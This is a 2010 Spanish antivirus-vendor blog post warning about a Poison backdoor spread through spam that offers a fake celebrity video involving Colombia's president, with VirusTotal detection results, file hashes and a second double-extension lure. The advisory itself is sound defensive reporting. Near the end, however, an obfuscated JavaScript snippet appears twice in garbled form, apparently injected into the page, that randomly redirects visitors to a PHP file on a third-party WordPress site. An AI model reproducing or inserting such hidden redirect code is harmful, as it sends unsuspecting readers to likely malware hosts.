NUEVO VIRUS BACKDOOR POISON QUE LLEGA ANEXADO A UN EMAIL INDICANDO SER UN VIDEO CON RELACIONES HOMOSEXUALES DE UN FAMOSO CANTANTE CON EL ACTUAL PRESIDENTE DE COLOMBIA (INGENIERIA SOCIAL)

Un malware aun poco detectado por los antivirus es distribuido por correo masivo tipo spam informando de un video en el que dicen que se ven relaciones homosexuales de un famoso cantante con un presidente de un pais americano (ingenieria social), dando pie a que los usuarios pulsen en el fichero del supuesto video, infectandose con el malware en cuestion.

Por el nombre AUTORUN que le da algun antivirus, suponemos que luego se transmite por pendrive, y por el prefijo Backdoor de otros, se entiende algunas de las misiones que tiene, lo cual veremos tras su monitorizacion.
Microsoft 1.6103 2010.09.15 Backdoor:Win32/Gaertob.E
NOD32 5451 2010.09.14 Win32/AutoRun.IRCBot.FC
El preanalisis del VirusTotal indica que actualmente solo lo detectan 10 de 43 antivirus:

File name: video.exe
Submission date: 2010-09-15 08:32:26 (UTC)
Current status: queued (#8) queued (#8) analysing finished
Result: 10/ 43 (23.3%)
 VT Community

malware
 Safety score: 0.0% 
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2010.09.15.01 2010.09.15 Backdoor/Win32.Poison
AntiVir 8.2.4.52 2010.09.14 –
Antiy-AVL 2.0.3.7 2010.09.15 –
Authentium 5.2.0.5 2010.09.15 –
Avast 4.8.1351.0 2010.09.15 Win32:Malware-gen
Avast5 5.0.594.0 2010.09.14 –
AVG 9.0.0.851 2010.09.14 –
BitDefender 7.2 2010.09.15 –
CAT-QuickHeal 11.00 2010.09.15 –
ClamAV 0.96.2.0-git 2010.09.15 –
Comodo 6083 2010.09.15 –
DrWeb 5.0.2.03300 2010.09.15 Trojan.Packed.20981
Emsisoft 5.0.0.37 2010.09.15 –
eSafe 7.0.17.0 2010.09.14 –
eTrust-Vet 36.1.7855 2010.09.14 –
F-Prot 4.6.1.107 2010.09.14 –
F-Secure 9.0.15370.0 2010.09.15 –
Fortinet 4.1.143.0 2010.09.15 –
GData 21 2010.09.15 –
Ikarus T3.1.1.88.0 2010.09.15 –
Jiangmin 13.0.900 2010.09.15 –
K7AntiVirus 9.63.2512 2010.09.14 –
Kaspersky 7.0.0.125 2010.09.15 Backdoor.Win32.Poison.bwus
McAfee 5.400.0.1158 2010.09.15 –
McAfee-GW-Edition 2010.1B 2010.09.14 –
Microsoft 1.6103 2010.09.15 Backdoor:Win32/Gaertob.E
NOD32 5451 2010.09.14 Win32/AutoRun.IRCBot.FC
Norman 6.06.06 2010.09.14 –
nProtect 2010-09-14.01 2010.09.14 –
Panda 10.0.2.7 2010.09.14 Suspicious file
PCTools 7.0.3.5 2010.09.15 –
Prevx 3.0 2010.09.15 –
Rising 22.65.02.01 2010.09.15 –
Sophos 4.57.0 2010.09.15 –
Sunbelt 6877 2010.09.15 –
SUPERAntiSpyware 4.40.0.1006 2010.09.15 –
Symantec 20101.1.1.7 2010.09.15 –
TheHacker 6.7.0.0.018 2010.09.15 –
TrendMicro 9.120.0.1004 2010.09.15 TROJ_KILLAV.ADB
TrendMicro-HouseCall 9.120.0.1004 2010.09.15 TROJ_KILLAV.ADB
VBA32 3.12.14.0 2010.09.15 –
ViRobot 2010.8.25.4006 2010.09.15 Backdoor.Win32.Poison.109705
VirusBuster 12.65.6.0 2010.09.14 –
Additional informationShow all 
MD5   : 5c79f32822ec79ba4a82dfdaa704bb81
SHA1  : 513078679dc609817358b8d2bf9d88719e4d40d3
Viendo que McAfee aun no lo conoce, se le envian inmediatamente muestras del mismo para su analisis y control.

Tras monitorizarlo implementaremos, en el ELITRIIP de hoy, su deteccion y eliminacion en la proxima version 6.92, que estará disponible esta tarde a partir de las 19 h.

Mientras, en la duda, pueden detectarse los ficheros infectados con el ELIMD5.EXE , entrando la cadena de deteccion :

5c79f32822ec79ba4a82dfdaa704bb81

y recuerden vacunar el ordenador y los pendrives con el ELIPEN, para impedir la propagacion por pendrive de este tipo de virus

saludos

ms, 15-9-2010

NOTA:  Además, buscando con el Google informacion de dicho presidente y el cantante, se obtiene link a web que ofrece otro “video” que resulta ser otro malware:, que se delata al ser el fichero con doble extension:  Juan_Manuel_Santos.avi.exe

Additional information
$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}ton>Show all$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}ton>
MD5   : 15f25a8cabb8d85867c14c5f442e0c01
SHA1  : 934ab833142880e525070a1b282a40cd5e220b38

el cual pasaremos tambien a monitorizar y controlar para añadir su control y eliminacion en la proxima version de la utilidad que proceda, de lo cual informaremos

ms.

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies